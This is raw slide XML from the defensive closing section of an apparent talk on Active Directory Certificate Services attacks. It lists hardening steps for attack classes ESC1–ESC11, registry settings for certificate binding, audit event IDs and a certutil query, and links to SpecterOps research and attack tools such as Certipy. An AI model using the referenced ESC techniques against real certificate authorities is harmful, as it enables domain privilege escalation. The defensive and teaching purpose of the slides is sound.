              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Disable EDITF_ATTRIBUTESUBJECTALTNAME2 - ESC6</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Require CA Certificate Manager Approval</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Restrict Enrolment Agents</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Audit CA Server Permissions - ESC7</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>DISABLE HTTP AND RPC ENDPOINTS!! ESC8/11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1a30ba6456_0_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Harden Templates</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="457" name="Google Shape;457;g21a30ba6456_0_43"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr>
            <p:ph idx="1" type="body"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1297500" y="1567550"/>
            <a:ext cx="4674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Audit your templates!</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Remove unused templates</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>https://github.com/GhostPack/PSPKIAudit</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Don’t allow users to supply the subject! - ESC1</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Enforce Strong Certificate Bindings - ESC1/6/9/10</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>HKLM\SYSTEM\CurrentControlSet\Services\Kdc\UseSubjectAltName 0</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HKLM\SYSTEM\CurrentControlSet\Services\Kdc\StrongCertificateBindingEnforcement 2</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buFont typeface="Courier New"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Courier New"/>
                <a:ea typeface="Courier New"/>
                <a:cs typeface="Courier New"/>
                <a:sym typeface="Courier New"/>
              </a:rPr>
              <a:t>HKLM\CurrentControlSet\Control\SecurityProviders\SCHANNEL\CertificateMappingMethods 0x18</a:t>
            </a:r>
            <a:endParaRPr>
              <a:latin typeface="Courier New"/>
              <a:ea typeface="Courier New"/>
              <a:cs typeface="Courier New"/>
              <a:sym typeface="Courier New"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="458" name="Google Shape;458;g21a30ba6456_0_43"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5972026" y="1002700"/>
            <a:ext cx="2763800" cy="3856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Where do you find Certificates?</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="161" name="Google Shape;161;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Certificates are stored locally for a number of use cases.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>A full list of installed ones can be found in certmgr (cert manager).</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>They are also in a .pfx format if they’ve been manually added or exported from certmgr.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="0" lvl="0" marL="0" rtl="0" algn="l">
              <a:lnSpc>
                <a:spcPct val="115000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="1200"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Secured using the Crypto API and/or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Data Protection API</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="162" name="Google Shape;162;p5"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect b="0" l="0" r="22141" t="0"/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4933225" y="1567550"/>
            <a:ext cx="3614626" cy="2911200"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="163" name="Google Shape;163;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1a30ba6456_0_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a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="464" name="Google Shape;464;g21a30ba6456_0_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Enable Logs:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>C</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>ertsrv.msc -&gt; right clicking on the CA -&gt; Auditing (ON Certificate Authority)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>GPO Computer Configuration -&gt; Windows Settings -&gt; Security Settings -&gt; Advanced Audit Policy Configuration</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>GPO Computer Configuration -&gt; Windows Settings -&gt; Local Policies -&gt; Audit Policy</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Certificate Request Event ID’s :</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Requested: 4886</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Approved and Issued: 4887</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Drill down:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>certutil.exe -v -view -restrict "Disposition=20,Request.SubmittedWhen&gt;=5/21/2021 11:15 AM,RequesterName=CORP\itadmin" -gmt -out requestername,rawrequest</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>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21a30ba6456_0_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a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="470" name="Google Shape;470;g21a30ba6456_0_7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Authentication Attempts Event ID’s:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>4768 - Kerberos TGT requested via Certificate</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>4769 - A Kerberos service ticket was requested (Schannel Default attempt)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>4648 - A logon was attempted using explicit credentials (Schannel Success)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>4624 - An account successfully logged on (Auth Package </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>Kerberos </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Login Proccess </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en">
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>Schannel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>4624 - Triggers on </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>failure</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> as well</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Kdcsvc Events ID’s</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>39/41/49 (Strong Certificate Mapping Failures)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Certificate Template Modifications:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>4899 - A Certificate Services template was updated (Only fires after cert requested)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>4900 - Certificate Services template security was update (Only fires after cert requested)</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>Protect Templates with adsiedit.msc:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>4662 - An operation was performed on an object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1a30ba6456_0_8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Monitoring</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="476" name="Google Shape;476;g21a30ba6456_0_8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 ACL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>modifications</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>:</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>4882: The security permissions for Certificate Services changed</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>4890: The certificate manager settings for Certificate Services changed.</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-298450" lvl="1" marL="914400" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1100"/>
              <a:buChar char="○"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>4892: A property of Certificate Services changed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1a30ba6456_0_9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82" name="Google Shape;482;g21a30ba6456_0_9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https://specterops.io/wp-content/uploads/sites/3/2022/06/Certified_Pre-Owned.pdf</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId4"/>
              </a:rPr>
              <a:t>https://posts.specterops.io/certified-pre-owned-d95910965cd2</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId5"/>
              </a:rPr>
              <a:t>https://posts.specterops.io/certificates-and-pwnage-and-patches-oh-my-8ae0f4304c1d</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId6"/>
              </a:rPr>
              <a:t>https://github.com/ly4k/Certipy</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId7"/>
              </a:rPr>
              <a:t>https://research.ifcr.dk/certipy-4-0-esc9-esc10-bloodhound-gui-new-authentication-and-request-methods-and-more-7237d88061f7</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId8"/>
              </a:rPr>
              <a:t>https://github.com/cfalta/PoshADCS</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId9"/>
              </a:rPr>
              <a:t>https://www.tarlogic.com/blog/ad-cs-manageca-rce/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId10"/>
              </a:rPr>
              <a:t>https://blog.qdsecurity.se/2022/05/27/manually-injecting-a-sid-in-a-certificate/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId11"/>
              </a:rPr>
              <a:t>https://luemmelsec.github.io/Skidaddle-Skideldi-I-just-pwnd-your-PKI/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>
              <a:t> </a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" u="sng">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:hlinkClick r:id="rId12"/>
              </a:rPr>
              <a:t>https://github.com/Orange-Cyberdefense/GOAD</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en"/>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21b58706213_0_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Thanks</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="488" name="Google Shape;488;g21b58706213_0_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coming to my talk</a:t>
            </a:r>
            <a:endParaRPr/>
          </a:p>
          <a:p>
            <a:pPr indent="-311150" lvl="0" marL="457200" rtl="0" algn="l">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:spcAft>
                <a:spcPts val="0"/>
              </a:spcAft>
              <a:buSzPts val="1300"/>
              <a:buChar char="●"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en"/>
              <a:t>The companies who let me do this </a:t>
            </a:r>
